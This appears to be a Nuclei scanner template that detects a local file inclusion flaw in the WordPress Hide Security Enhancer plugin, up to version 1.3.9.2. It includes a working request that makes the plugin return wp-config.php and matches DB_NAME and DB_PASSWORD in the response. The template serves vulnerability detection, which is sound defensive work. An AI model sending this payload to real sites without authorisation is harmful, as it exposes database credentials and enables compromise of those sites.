id: hide-security-enhancer-lfi

info:
  name: WordPress Hide Security Enhancer 1.3.9.2 Local File Inclusion
  author: dhiyaneshDK
  severity: high
  description: WordPress Hide Security Enhancer version 1.3.9.2 or less is susceptible to a local file inclusion vulnerability which could allow malicious visitors to download any file in the installation.
  remediation: Upgrade to version 1.4 or later.
  reference:
    - https://secupress.me/blog/arbitrary-file-download-vulnerability-in-wp-hide-security-enhancer-1-3-9-2/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: wordpress,wp-plugin,lfi,wp

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100d07c412c4eef8fa4b0f4077976bcc6180b007984c45ab972fe24007b36e8e9b6022100a8339c0bec1e306c32a56d456731b121d146f5a59a98d2802c4bdb0309b48679:922c64590222798bb761d5b6d8e72950
